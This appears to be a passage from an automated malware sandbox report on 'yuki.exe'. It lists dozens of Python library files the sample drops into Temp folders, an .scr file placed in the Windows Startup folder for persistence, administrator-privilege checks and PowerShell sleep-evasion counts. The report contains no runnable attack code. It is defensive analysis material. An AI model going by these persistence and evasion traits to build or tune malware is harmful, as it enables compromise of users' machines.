Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\cv2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_uuid.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\python312.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\block\_block.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_elementtree.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_sqlite3.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\cv2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\opencv_videoio_ffmpeg4100_64.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\zstandard\backend_c.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\select.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\_version.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_uuid.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_sqlite3.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\zstandard\_cffi.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\lz4\block\_block.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\select.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18049
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-17581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep count: 7847 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep count: 1829 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 8003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 1194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4944Thread sleep count: 5962 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep count: 3672 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 7452 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 2034 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep count: 9022 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep count: 468 > 30
